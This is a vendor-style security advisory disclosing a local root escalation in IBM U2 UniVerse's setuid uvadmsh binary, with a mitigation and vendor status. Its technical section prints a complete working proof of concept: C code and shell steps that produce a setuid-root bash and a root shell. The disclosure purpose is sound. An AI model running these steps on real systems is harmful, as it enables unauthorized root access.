Secure Network Operations, Inc. http://www.secnetops.com Strategic Reconnaissance Team research@secnetops.com Team Lead Contact kf@secnetops.com Our Mission: ************************************************************************ Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer. Quick Summary: ************************************************************************ Advisory Number : SRT2003-07-07-0833 Product : IBM U2 UniVerse Version : Version <= 10.0.0.9 ? Vendor : http://ibm.com/software/data/u2/universe/ Class : local Criticality : High (to UniVerse servers with local users) Operating System(s) : Only confirmed on Linux (other unix based?) High Level Explanation ************************************************************************ High Level Description : users with uvadm rights can take root What to do : chmod -s /usr/ibm/uv/bin/uvadmsh Technical Details ************************************************************************ Proof Of Concept Status : SNO Does have PoC code for this issue. Low Level Description : UniVerse is an extended relational database designed for embedding in vertical applications. Its nested relational data model results in intuitive data modeling and fewer resulting tables. UniVerse provides data access, storage and management capabilities across Microsoft® Windows® NT, Linux and UNIplatform. The creation and use of the Unix user 'uvadm' is optional for UniVerse. It is not required for the successfull installation, configuration and administration of UniVerse. The intended use of uvadm is to allow a selected, specific non-root user to perform all aspects of UniVerse administration. The uvadmsh program checks the users name against the string "uvadm" which means in order to exploit this issue you need to have access to the user uvadm. [kf@vegeta kf]$ ltrace /tmp/uvadmsh -uv.install /tmp ... strcmp("kf", "uvadm") = -1 [uvadm@vegeta uvadm]$ id uid=503(uvadm) gid=503(uvadm) groups=503(uvadm) You will note that with the proper uid the binary begins looking for the command line option "-uv.install" which is the path to a binary file to execute. [uvadm@vegeta uvadm]$ ltrace /tmp/uvadmsh -uv.install /tmp ... strcmp("uvadm", "uvadm") = 0 strcmp("-uv.install", "-uv.install") = 0 This condition is fairly easy to take advantage of as you can see here. [uvadm@vegeta uvadm]$ cat > /tmp/uv.install.c main() { setuid(0); system("cc -o /tmp/owned /tmp/owned.c"); system("chmod 4755 /tmp/owned"); } [uvadm@vegeta uvadm]$ cc -o /tmp/uv.install /tmp/uv.install.c [uvadm@vegeta uvadm]$ cat > /tmp/owned.c main() { setuid(0); system("/bin/bash"); } [uvadm@vegeta uvadm]$ ls -al /tmp/owned ls: /tmp/owned: No such file or directory [uvadm@vegeta uvadm]$ /usr/ibm/uv/bin/uvadmsh -uv.install /tmp [uvadm@vegeta uvadm]$ ls -al /tmp/owned -rwsr-xr-x 1 root uvadm 11640 Jul 2 20:15 /tmp/owned [uvadm@vegeta uvadm]$ /tmp/owned [root@vegeta uvadm]# id uid=0(root) gid=503(uvadm) groups=503(uvadm) Patch or Workaround : chmod -s /usr/ibm/uv/bin/uvadmsh Note: If you decide to 'chmod -s uvadmsh', you will need to be a root user to perform all of the uvadmsh functions. Vendor Status : The IBM U2 staff will have this issue resolved in a future release of IBM U2. Patches may also be supplied on a per client basis at IBM's disgression. Bugtraq URL : to be assigned ------------------------------------------------------------------------ This advisory was released by Secure Network Operations,Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact research@secnetops.com for information on how to obtain exploit information.